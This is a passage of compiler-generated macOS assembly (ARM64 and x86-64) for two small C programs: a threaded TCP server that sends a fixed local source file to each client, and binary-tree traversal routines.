#48] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #56] mov x9, sp str x8, [x9] adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf ldr x8, [sp, #40] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #48] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldur w0, [x29, #-52] ldr x1, [sp, #56] ldursw x2, [x29, #-68] bl _write adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _printf ldr x8, [sp, #40] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #48] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldur w0, [x29, #-52] bl _close ldur x8, [x29, #-40] str x8, [sp, #16] ; 8-byte Folded Spill ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_8 b LBB0_7 LBB0_7: bl ___stack_chk_fail LBB0_8: ldr x0, [sp, #16] ; 8-byte Folded Reload ldp x29, x30, [sp, #160] ; 16-byte Folded Reload add sp, sp, #176 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #448 .cfi_def_cfa_offset 448 stp x28, x27, [sp, #416] ; 16-byte Folded Spill stp x29, x30, [sp, #432] ; 16-byte Folded Spill add x29, sp, #432 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, ___stdinp@GOTPAGE ldr x8, [x8, ___stdinp@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill adrp x8, ___stdoutp@GOTPAGE ldr x8, [x8, ___stdoutp@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill mov w2, #0 stur wzr, [x29, #-20] mov w0, #2 mov w1, #1 bl _socket str w0, [sp, #44] ldr w8, [sp, #44] adds w8, w8, #1 cset w8, ne tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF bl _printf b LBB1_2 LBB1_2: add x1, sp, #48 str xzr, [sp, #48] str xzr, [sp, #56] mov w8, #2 strb w8, [sp, #49] str wzr, [sp, #52] mov w8, #38182 strh w8, [sp, #50] ldr w0, [sp, #44] mov w2, #16 bl _bind str w0, [sp, #16] ldr w8, [sp, #16] adds w8, w8, #1 cset w8, ne tbnz w8, #0, LBB1_4 b LBB1_3 LBB1_3: adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF bl _printf b LBB1_4 LBB1_4: ldr x8, [sp] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #8] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr w8, [sp, #16] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF bl _printf b LBB1_6 LBB1_6: ldr x8, [sp] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #8] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr w0, [sp, #44] mov w1, #5 bl _listen str w0, [sp, #40] ldr w8, [sp, #40] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB1_8 b LBB1_7 LBB1_7: adrp x0, l_.str.12@PAGE add x0, x0, l_.str.12@PAGEOFF bl _printf b LBB1_8 LBB1_8: ldr x8, [sp] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #8] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr w8, [sp, #40] adds w8, w8, #1 cset w8, ne tbnz w8, #0, LBB1_10 b LBB1_9 LBB1_9: adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _printf b LBB1_10 LBB1_10: ldr x8, [sp] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #8] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush b LBB1_11 LBB1_11: ; =>This Inner Loop Header: Depth=1 ldr w0, [sp, #44] mov x2, #0 mov x1, x2 bl _accept add x8, sp, #32 str w0, [sp, #32] str x8, [sp, #80] ldr w8, [sp, #32] adds w8, w8, #1 cset w8, ne tbnz w8, #0, LBB1_13 b LBB1_12 LBB1_12: ; in Loop: Header=BB1_11 Depth=1 adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF bl _printf ldr x8, [sp] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #8] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush b LBB1_14 LBB1_13: ; in Loop: Header=BB1_11 Depth=1 adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF bl _printf ldr x8, [sp] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush ldr x8, [sp, #8] ; 8-byte Folded Reload ldr x0, [x8] bl _fflush b LBB1_14 LBB1_14: ; in Loop: Header=BB1_11 Depth=1 ldr x3, [sp, #80] add x0, sp, #88 mov x1, #0 adrp x2, _service@PAGE add x2, x2, _service@PAGEOFF bl _pthread_create b LBB1_11 .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%c" l_.str.1: ; @.str.1 .asciz "going to read file" l_.str.2: ; @.str.2 .asciz "thread15.c" l_.str.3: ; @.str.3 .asciz "r" l_.str.4: ; @.str.4 .asciz "%d" l_.str.5: ; @.str.5 .asciz "Memory error" l_.str.6: ; @.str.6 .asciz "file read" l_.str.7: ; @.str.7 .asciz "%s" l_.str.8: ; @.str.8 .asciz "file write" l_.str.9: ; @.str.9 .asciz "error in socket creation " l_.str.10: ; @.str.10 .asciz "error in bind" l_.str.11: ; @.str.11 .asciz "binding connection is ok" l_.str.12: ; @.str.12 .asciz " listen connection is ok " l_.str.13: ; @.str.13 .asciz "error in listening connection " l_.str.14: ; @.str.14 .asciz "error in accepting connection" l_.str.15: ; @.str.15 .asciz " accept connection is ok " .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _service ## -- Begin function service .p2align 4, 0x90 _service: ## @service .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $112, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -48(%rbp) movq -48(%rbp), %rax movl (%rax), %eax movl %eax, -52(%rbp) movl -52(%rbp), %edi leaq -32(%rbp), %rsi movl $20, %edx callq _read movq %rax, -64(%rbp) movl $0, -56(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $20, -56(%rbp) jge LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movslq -56(%rbp), %rax movsbl -32(%rbp,%rax), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -56(%rbp), %eax addl $1, %eax movl %eax, -56(%rbp) jmp LBB0_1 LBB0_4: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush leaq L_.str.2(%rip), %rdi leaq L_.str.3(%rip), %rsi callq _fopen movq %rax, -80(%rbp) movq -80(%rbp), %rdi xorl %eax, %eax movl %eax, %esi movl $2, %edx callq _fseek movq -80(%rbp), %rdi callq _ftell ## kill: def $eax killed $eax killed $rax movl %eax, -68(%rbp) movq -80(%rbp), %rdi callq _rewind leaq -68(%rbp), %rax movq %rax, -88(%rbp) leaq L_.str.4(%rip), %rdi movl $8, %esi movb $0, %al callq _printf movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movl -52(%rbp), %edi movq -88(%rbp), %rsi movl $8, %edx callq _write movslq -68(%rbp), %rdi shlq $0, %rdi callq _malloc movq %rax, -104(%rbp) cmpq $0, -104(%rbp) jne LBB0_6 ## %bb.5: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rsi leaq L_.str.5(%rip), %rdi callq _fputs movl $2, %edi callq _exit LBB0_6: movq -104(%rbp), %rdi movslq -68(%rbp), %rdx movq -80(%rbp), %rcx movl $1, %esi callq _fread movl -68(%rbp), %esi leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf leaq L_.str.6(%rip), %rdi movb $0, %al callq _printf movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq -104(%rbp), %rsi leaq L_.str.7(%rip), %rdi movb $0, %al callq _printf movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movl -52(%rbp), %edi movq -104(%rbp), %rsi movslq -68(%rbp), %rdx callq _write leaq L_.str.8(%rip), %rdi movb $0, %al callq _printf movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movl -52(%rbp), %edi callq _close movq -40(%rbp), %rax movq %rax, -112(%rbp) ## 8-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_8 ## %bb.7: movq -112(%rbp), %rax ## 8-byte Reload addq $112, %rsp popq %rbp retq LBB0_8: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $416, %rsp ## imm = 0x1A0 movl $0, -4(%rbp) movl $2, %edi movl $1, %esi xorl %edx, %edx callq _socket movl %eax, -380(%rbp) cmpl $-1, -380(%rbp) jne LBB1_2 ## %bb.1: leaq L_.str.9(%rip), %rdi movb $0, %al callq _printf LBB1_2: leaq -376(%rbp), %rdi xorl %esi, %esi movl $16, %edx callq _memset movb $2, -375(%rbp) movl $0, -372(%rbp) movw $-27354, -374(%rbp) ## imm = 0x9526 movl -380(%rbp), %edi leaq -376(%rbp), %rsi movl $16, %edx callq _bind movl %eax, -408(%rbp) cmpl $-1, -408(%rbp) jne LBB1_4 ## %bb.3: leaq L_.str.10(%rip), %rdi movb $0, %al callq _printf LBB1_4: movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush cmpl $0, -408(%rbp) jne LBB1_6 ## %bb.5: leaq L_.str.11(%rip), %rdi movb $0, %al callq _printf LBB1_6: movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movl -380(%rbp), %edi movl $5, %esi callq _listen movl %eax, -384(%rbp) cmpl $0, -384(%rbp) jne LBB1_8 ## %bb.7: leaq L_.str.12(%rip), %rdi movb $0, %al callq _printf LBB1_8: movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush cmpl $-1, -384(%rbp) jne LBB1_10 ## %bb.9: leaq L_.str.13(%rip), %rdi movb $0, %al callq _printf LBB1_10: movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush LBB1_11: ## =>This Inner Loop Header: Depth=1 movl -380(%rbp), %edi xorl %eax, %eax movl %eax, %edx movq %rdx, %rsi callq _accept movl %eax, -392(%rbp) leaq -392(%rbp), %rax movq %rax, -344(%rbp) cmpl $-1, -392(%rbp) jne LBB1_13 ## %bb.12: ## in Loop: Header=BB1_11 Depth=1 leaq L_.str.14(%rip), %rdi movb $0, %al callq _printf movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush jmp LBB1_14 LBB1_13: ## in Loop: Header=BB1_11 Depth=1 leaq L_.str.15(%rip), %rdi movb $0, %al callq _printf movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fflush LBB1_14: ## in Loop: Header=BB1_11 Depth=1 leaq -336(%rbp), %rdi movq -344(%rbp), %rcx xorl %eax, %eax movl %eax, %esi leaq _service(%rip), %rdx callq _pthread_create jmp LBB1_11 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%c" L_.str.1: ## @.str.1 .asciz "going to read file" L_.str.2: ## @.str.2 .asciz "thread15.c" L_.str.3: ## @.str.3 .asciz "r" L_.str.4: ## @.str.4 .asciz "%d" L_.str.5: ## @.str.5 .asciz "Memory error" L_.str.6: ## @.str.6 .asciz "file read" L_.str.7: ## @.str.7 .asciz "%s" L_.str.8: ## @.str.8 .asciz "file write" L_.str.9: ## @.str.9 .asciz "error in socket creation " L_.str.10: ## @.str.10 .asciz "error in bind" L_.str.11: ## @.str.11 .asciz "binding connection is ok" L_.str.12: ## @.str.12 .asciz " listen connection is ok " L_.str.13: ## @.str.13 .asciz "error in listening connection " L_.str.14: ## @.str.14 .asciz "error in accepting connection" L_.str.15: ## @.str.15 .asciz " accept connection is ok " .subsections_via_symbols
the_stack_data/73574388.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _read_1b ; -- Begin function read_1b .p2align 2 _read_1b: ; @read_1b .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] stur x2, [x29, #-24] str x3, [sp, #32] ldur x8, [x29, #-8] mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf str wzr, [sp, #28] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #28] ldur x9, [x29, #-8] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur x8, [x29, #-16] ldrsw x9, [sp, #28] add x11, x8, x9, lsl #2 ldur x8, [x29, #-24] ldrsw x9, [sp, #28] add x10, x8, x9, lsl #2 ldr x8, [sp, #32] ldrsw x9, [sp, #28] add x8, x8, x9, lsl #2 mov x9, sp str x11, [x9] str x10, [x9, #8] str x8, [x9, #16] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB0_1 LBB0_4: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _inOrder_1b ; -- Begin function inOrder_1b .p2align 2 _inOrder_1b: ; @inOrder_1b .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 str w0, [sp, #60] str x1, [sp, #48] str x2, [sp, #40] str x3, [sp, #32] str x4, [sp, #24] str wzr, [sp, #20] str wzr, [sp, #16] str wzr, [sp, #12] b LBB1_1 LBB1_1: ; =>This Loop Header: Depth=1 ; Child Loop BB1_2 Depth 2 b LBB1_2 LBB1_2: ; Parent Loop BB1_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #12] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB1_4 b LBB1_3 LBB1_3: ; in Loop: Header=BB1_2 Depth=2 ldr w8, [sp, #12] ldrsw x10, [sp, #16] mov x9, x10 add w9, w9, #1 str w9, [sp, #16] adrp x9, _inOrder_1b.stack@PAGE add x9, x9, _inOrder_1b.stack@PAGEOFF str w8, [x9, x10, lsl #2] ldr x8, [sp, #40] ldrsw x9, [sp, #12] ldr w8, [x8, x9, lsl #2] str w8, [sp, #12] b LBB1_2 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #16] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #16] subs w9, w8, #1 str w9, [sp, #16] adrp x8, _inOrder_1b.stack@PAGE add x8, x8, _inOrder_1b.stack@PAGEOFF ldr w8, [x8, w9, sxtw #2] str w8, [sp, #12] ldr x8, [sp, #48] ldrsw x9, [sp, #12] ldr w8, [x8, x9, lsl #2] ldr x9, [sp, #24] ldrsw x10, [sp, #20] mov x11, x10 add w11, w11, #1 str w11, [sp, #20] str w8, [x9, x10, lsl #2] ldr x8, [sp, #32] ldrsw x9, [sp, #12] ldr w8, [x8, x9, lsl #2] str w8, [sp, #12] b LBB1_7 LBB1_6: add sp, sp, #64 ret LBB1_7: ; in Loop: Header=BB1_1 Depth=1 b LBB1_1 .cfi_endproc ; -- End function .globl _preOrder_1b ; -- Begin function preOrder_1b .p2align 2 _preOrder_1b: ; @preOrder_1b .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 str w0, [sp, #60] str x1, [sp, #48] str x2, [sp, #40] str x3, [sp, #32] str x4, [sp, #24] mov w8, #0 str wzr, [sp, #20] str wzr, [sp, #16] ldrsw x10, [sp, #16] mov x9, x10 add w9, w9, #1 str w9, [sp, #16] adrp x9, _preOrder_1b.stack@PAGE add x9, x9, _preOrder_1b.stack@PAGEOFF str w8, [x9, x10, lsl #2] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB2_7 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #16] subs w9, w8, #1 str w9, [sp, #16] adrp x8, _preOrder_1b.stack@PAGE add x8, x8, _preOrder_1b.stack@PAGEOFF ldr w8, [x8, w9, sxtw #2] str w8, [sp, #12] ldr x8, [sp, #48] ldrsw x9, [sp, #12] ldr w8, [x8, x9, lsl #2] ldr x9, [sp, #24] ldrsw x10, [sp, #20] mov x11, x10 add w11, w11, #1 str w11, [sp, #20] str w8, [x9, x10, lsl #2] ldr x8, [sp, #32] ldrsw x9, [sp, #12] ldr w8, [x8, x9, lsl #2] adds w8, w8, #1 cset w8, eq tbnz w8, #0, LBB2_4 b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 ldr x8, [sp, #32] ldrsw x9, [sp, #12] ldr w8, [x8, x9, lsl #2] ldrsw x10, [sp, #16] mov x9, x10 add w9, w9, #1 str w9, [sp, #16] adrp x9, _preOrder_1b.stack@PAGE add x9, x9, _preOrder_1b.stack@PAGEOFF str w8, [x9, x10, lsl #2] b LBB2_4 LBB2_4: ; in Loop: Header=BB2_1 Depth=1 ldr x8, [sp, #40] ldrsw x9, [sp, #12] ldr w8, [x8, x9, lsl #2] adds w8, w8, #1 cset w8, eq tbnz w8, #0, LBB2_6 b LBB2_5 LBB2_5: ; in Loop: Header=BB2_1 Depth=1 ldr x8, [sp, #40] ldrsw x9, [sp, #12] ldr w8, [x8, x9, lsl #2] ldrsw x10, [sp, #16] mov x9, x10 add w9, w9, #1 str w9, [sp, #16] adrp x9, _preOrder_1b.stack@PAGE add x9, x9, _preOrder_1b.stack@PAGEOFF str w8, [x9, x10, lsl #2] b LBB2_6 LBB2_6: ; in Loop: Header=BB2_1 Depth=1 b LBB2_1 LBB2_7: add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _postOrder_1b ; -- Begin function postOrder_1b .p2align 2 _postOrder_1b: ; @postOrder_1b .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 str w0, [sp, #60] str x1, [sp, #48] str x2, [sp, #40] str x3, [sp, #32] str x4, [sp, #24] str wzr, [sp, #20] str wzr, [sp, #16] str wzr, [sp, #12] str wzr, [sp, #4] b LBB3_1 LBB3_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #4] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB3_3 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 ldr w8, [sp, #4] ldrsw x10, [sp, #16] mov x9, x10 add w9, w9, #1 str w9, [sp, #16] adrp x9, _postOrder_1b.stack@PAGE add x9, x9, _postOrder_1b.stack@PAGEOFF str w8, [x9, x10, lsl #2] ldrsw x9, [sp, #12] mov x8, x9 add w8, w8, #1 str w8, [sp, #12] adrp x8, _postOrder_1b.boolStack@PAGE add x8, x8, _postOrder_1b.boolStack@PAGEOFF add x8, x8, x9 strb wzr, [x8] ldr x8, [sp, #40] ldrsw x9, [sp, #4] ldr w8, [x8, x9, lsl #2] str w8, [sp, #4] b LBB3_1 LBB3_3: b LBB3_4 LBB3_4: ; =>This Loop Header: Depth=1 ; Child Loop BB3_8 Depth 2 ldr w8, [sp, #16] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_12 b LBB3_5 LBB3_5: ; in Loop: Header=BB3_4 Depth=1 ldr w8, [sp, #16] subs w9, w8, #1 adrp x8, _postOrder_1b.stack@PAGE add x8, x8, _postOrder_1b.stack@PAGEOFF ldr w8, [x8, w9, sxtw #2] str w8, [sp, #4] ldr w8, [sp, #12] subs w9, w8, #1 adrp x8, _postOrder_1b.boolStack@PAGE add x8, x8, _postOrder_1b.boolStack@PAGEOFF add x8, x8, w9, sxtw ldrb w8, [x8] strb w8, [sp, #11] ldrb w8, [sp, #11] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_7 b LBB3_6 LBB3_6: ; in Loop: Header=BB3_4 Depth=1 ldr x8, [sp, #48] ldrsw x9, [sp, #4] ldr w8, [x8, x9, lsl #2] ldr x9, [sp, #24] ldrsw x10, [sp, #20] mov x11, x10 add w11, w11, #1 str w11, [sp, #20] str w8, [x9, x10, lsl #2] ldr w8, [sp, #16] subs w8, w8, #1 str w8, [sp, #16] ldr w8, [sp, #12] subs w8, w8, #1 str w8, [sp, #12] b LBB3_11 LBB3_7: ; in Loop: Header=BB3_4 Depth=1 ldr w8, [sp, #12] subs w8, w8, #1 str w8, [sp, #12] ldrsw x9, [sp, #12] mov x8, x9 add w8, w8, #1 str w8, [sp, #12] adrp x8, _postOrder_1b.boolStack@PAGE add x8, x8, _postOrder_1b.boolStack@PAGEOFF add x9, x8, x9 mov w8, #1 strb w8, [x9] ldr x8, [sp, #32] ldrsw x9, [sp, #4] ldr w8, [x8, x9, lsl #2] str w8, [sp, #4] b LBB3_8 LBB3_8: ; Parent Loop BB3_4 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #4] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB3_10 b LBB3_9 LBB3_9: ; in Loop: Header=BB3_8 Depth=2 ldr w8, [sp, #4] ldrsw x10, [sp, #16] mov x9, x10 add w9, w9, #1 str w9, [sp, #16] adrp x9, _postOrder_1b.stack@PAGE add x9, x9, _postOrder_1b.stack@PAGEOFF str w8, [x9, x10, lsl #2] ldrsw x9, [sp, #12] mov x8, x9 add w8, w8, #1 str w8, [sp, #12] adrp x8, _postOrder_1b.boolStack@PAGE add x8, x8, _postOrder_1b.boolStack@PAGEOFF add x8, x8, x9 strb wzr, [x8] ldr x8, [sp, #40] ldrsw x9, [sp, #4] ldr w8, [x8, x9, lsl #2] str w8, [sp, #4] b LBB3_8 LBB3_10: ; in Loop: Header=BB3_4 Depth=1 b LBB3_11 LBB3_11: ; in Loop: Header=BB3_4 Depth=1 b LBB3_4 LBB3_12: add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _print_1b ; -- Begin function print_1b .p2align 2 _print_1b: ; @print_1b .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str x1, [sp, #16] str wzr, [sp, #12] b LBB4_1 LBB4_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] ldur w9, [x29, #-4] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_6 b LBB4_2 LBB4_2: ; in Loop: Header=BB4_1 Depth=1 ldr w8, [sp, #12] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB4_4 b LBB4_3 LBB4_3: ; in Loop: Header=BB4_1 Depth=1 adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB4_4 LBB4_4: ; in Loop: Header=BB4_1 Depth=1 ldr x8, [sp, #16] ldrsw x9, [sp, #12] ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB4_5 LBB4_5: ; in Loop: Header=BB4_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB4_1 LBB4_6: adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _main_1b2 ; -- Begin function main_1b2 .p2align 2 _main_1b2: ; @main_1b2 .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _main_1b2.n@PAGE stur x8, [x29, #-24] ; 8-byte Folded Spill adrp x0, _main_1b2.n@PAGE add x0, x0, _main_1b2.n@PAGEOFF stur x0, [x29, #-8] ; 8-byte Folded Spill adrp x1, _main_1b2.key@PAGE add x1, x1, _main_1b2.key@PAGEOFF str x1, [sp, #16] ; 8-byte Folded Spill adrp x2, _main_1b2.left@PAGE add x2, x2, _main_1b2.left@PAGEOFF str x2, [sp, #24] ; 8-byte Folded Spill adrp x3, _main_1b2.right@PAGE add x3, x3, _main_1b2.right@PAGEOFF str x3, [sp, #32] ; 8-byte Folded Spill bl _read_1b ldr x1, [sp, #16] ; 8-byte Folded Reload ldr x2, [sp, #24] ; 8-byte Folded Reload ldr x3, [sp, #32] ; 8-byte Folded Reload ldur x8, [x29, #-24] ; 8-byte Folded Reload ldr w0, [x8, _main_1b2.n@PAGEOFF] adrp x4, _main_1b2.result@PAGE add x4, x4, _main_1b2.result@PAGEOFF stur x4, [x29, #-16] ; 8-byte Folded Spill bl _inOrder_1b ldur x8, [x29, #-24] ; 8-byte Folded Reload ldur x1, [x29, #-16] ; 8-byte Folded Reload ldr w0, [x8, _main_1b2.n@PAGEOFF] bl _print_1b ldr x1, [sp, #16] ; 8-byte Folded Reload ldr x2, [sp, #24] ; 8-byte Folded Reload ldr x3, [sp, #32] ; 8-byte Folded Reload ldur x8, [x29, #-24] ; 8-byte Folded Reload ldur x4, [x29, #-16] ; 8-byte Folded Reload ldr w0, [x8, _main_1b2.n@PAGEOFF] bl _preOrder_1b ldur x8, [x29, #-24] ; 8-byte Folded Reload ldur x1, [x29, #-16] ; 8-byte Folded Reload ldr w0, [x8, _main_1b2.n@PAGEOFF] bl _print_1b ldr x1, [sp, #16] ; 8-byte Folded Reload ldr x2, [sp, #24] ; 8-byte Folded Reload ldr x3, [sp, #32] ; 8-byte Folded Reload ldur x8, [x29, #-24] ; 8-byte Folded Reload ldur x4, [x29, #-16] ; 8-byte Folded Reload ldr w0, [x8, _main_1b2.n@PAGEOFF] bl _postOrder_1b ldur x8, [x29, #-24] ; 8-byte Folded Reload ldur x1, [x29, #-16] ; 8-byte Folded Reload ldr w0, [x8, _main_1b2.n@PAGEOFF] bl _print_1b ldur x8, [x29, #-8] ; 8-byte Folded Reload mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%d%d%d" .zerofill __DATA,__bss,_inOrder_1b.stack,400000,2 ; @inOrder_1b.stack .zerofill __DATA,__bss,_preOrder_1b.stack,400000,2 ; @preOrder_1b.stack .zerofill __DATA,__bss,_postOrder_1b.stack,400000,2 ; @postOrder_1b.stack .zerofill __DATA,__bss,_postOrder_1b.boolStack,100000,0 ; @postOrder_1b.boolStack l_.str.2: ; @.str.2 .asciz " " 